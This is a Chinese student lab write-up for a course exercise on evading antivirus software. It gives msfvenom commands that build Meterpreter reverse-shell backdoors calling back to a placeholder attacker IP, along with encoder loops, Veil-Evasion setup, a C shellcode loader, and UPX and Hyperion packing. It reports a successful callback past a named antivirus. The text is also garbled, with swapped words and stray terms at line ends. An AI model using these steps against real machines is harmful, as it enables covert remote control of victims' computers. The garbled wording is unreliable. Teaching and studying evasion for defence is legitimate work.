2018-2019-2 网络对抗技术 20165219 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165219 Exp3 免杀原理与实践
实验任务
1 正确使用msf编码器,msfvenom生成如jar之类的其余文件,veil-evasion,本身利用shellcode编程等免杀工具或技巧;(1.5分)php
2 经过组合应用各类技术实现恶意代码免杀(1分)
(若是成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)java
3 用另外一电脑实测,在杀软开启的状况下,可运行并回连成功,注明电脑的杀软名称与版本(1分)shell
基础问题回答
(1)杀软是如何检测出恶意代码的?编程
分析特征码,恶意代码都含有的一段代码,简称特征码,只要包含这段代码就被认定是恶意代码;windows
检测该代码执行时是否有异常的行为,好比打开异常端口、关闭防火墙等。数组
(2)免杀是作什么?
经过一些手段对恶意代码进行假装,不被杀毒软件检测出。安全
(3)免杀的基本方法有哪些?网络
改变特征码,改变行为,利用现有playload手工打造一个后门程序。tcp
实验过程
正确使用msf编码器,msfvenom生成如jar之类的其余文件,veil-evasion,加壳工具,本身利用shellcode编程等免杀工具或技巧
使用msf编码器msfvenom生成后门程序
实验二中生成的后门程序,在virscan网站中扫描
工具
经过图片能够看到,不加处理的恶意代码能被绝大多数杀毒软件识别。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=攻击机的IP LPORT=端口号 -f exe > xxx.exe
进行10次编码试试下降检出率
在virscan网站中扫描
虽然进行屡次编码,但特征码仍存在,所以依旧能被绝大多数杀毒软件检测出来。
msfvenom生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=攻击机的IP LPORT=端口号 x> xxx.php
在virscan网站中扫描
msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=攻击机的IP LPORT=端口号 x> xxx.jar
在virscan网站中扫描
使用veil-evasion生成后门程序及检测
安装veil成功以后,输入veil,再用use evasion命令
输入命令use c/meterpreter/rev_tcp.py进入配置界面
设置反弹链接IP:set LHOST 此处IP为Kali IP
设置端口:set LPORT 5219
输入generate生成文件,而后输入playload的名字
在目录 /usr/share/veil-output/compiled里找到咱们生成的文件,在virscan网站中扫描
利用shellcode编程
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=端口号 -f c
生成一段c语言格式的shellcode数组
编辑一个.c文件
unsigned char buf[] =
int main()
{
int (*func)() = (int(*)())buf;
func();
}
i686-w64-mingw32-g++ 20165219.c -o 20165219.exe
编译后变成可执行文件
进行检测
windows上用杀软检测
加压缩壳
对上面的shellcode加壳
检测
使用加密壳Hyperion
将wyb_upxed.exe拷贝到/usr/share/windows-binaries/hyperion/
端输入命令wine hyperion.exe -v wyb_upxed.exe wyb_upxed_Hyperion.exe
经过组合应用各类技术实现恶意代码免杀
对半手工制做shellcode加压缩壳不能达到免杀的目的,加密壳有必定的概率是能够达到了免杀的目的。
加密壳的免杀和反弹链接
用另外一电脑实测,在杀软开启的状况下,可运行并回连成功,注明电脑的杀软名称与版本
对方电脑的杀毒软件为:360安全卫士 版本11
免杀的截图
回连成功的结果图
实验过程当中遇到的问题
没有成功安装veil
解决办法:拷了别的同窗安装好veil的虚拟机
离实战还缺些什么技术或步骤?
免杀技术单一,跟不上病毒库的更新,之后应该尝试多种技术的组合
实践总结与体会
学习完本次的实验对免杀原理有了深层次的了解,为之后防范恶意软件攻击打下了基础。
- 1. 20155207 《网络对抗技术》EXP3 免杀原理与实践
- 2. 20145215《网络对抗》Exp3 免杀原理与实践
- 3. 20145307陈俊达《网络对抗》Exp3 免杀原理与实践
- 4. 20154307《网络对抗》Exp3 免杀原理与实践
- 5. 20155333 《网络对抗》Exp3 免杀原理与实践
- 6. 20155218《网络对抗》Exp3 免杀原理与实践
- 7. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践
- 8. 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 20165211
- 9. 2017-2018-4 20155203《网络对抗技术》Exp3 免杀原理与实践
- 10. 2018-2019-2 20165234 《网络对抗技术》 Exp3 免杀原理与实践
- 更多相关文章...
- • 网站主机 技术 - 网站主机教程
- • XML 相关技术 - XML 教程
- • ☆技术问答集锦(13)Java Instrument原理
- • Java Agent入门实战(三)-JVM Attach原理与使用
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. CVPR 2020 论文大盘点-光流篇
- 2. Photoshop教程_ps中怎么载入图案?PS图案如何导入?
- 3. org.pentaho.di.core.exception.KettleDatabaseException:Error occurred while trying to connect to the
- 4. SonarQube Scanner execution execution Error --- Failed to upload report - 500: An error has occurred
- 5. idea 导入源码包
- 6. python学习 day2——基础学习
- 7. 3D将是页游市场新赛道?
- 8. osg--交互
- 9. OSG-交互
- 10. Idea、spring boot 图片(pgn显示、jpg不显示)解决方案
- 1. 20155207 《网络对抗技术》EXP3 免杀原理与实践
- 2. 20145215《网络对抗》Exp3 免杀原理与实践
- 3. 20145307陈俊达《网络对抗》Exp3 免杀原理与实践
- 4. 20154307《网络对抗》Exp3 免杀原理与实践
- 5. 20155333 《网络对抗》Exp3 免杀原理与实践
- 6. 20155218《网络对抗》Exp3 免杀原理与实践
- 7. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践
- 8. 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 20165211
- 9. 2017-2018-4 20155203《网络对抗技术》Exp3 免杀原理与实践
- 10. 2018-2019-2 20165234 《网络对抗技术》 Exp3 免杀原理与实践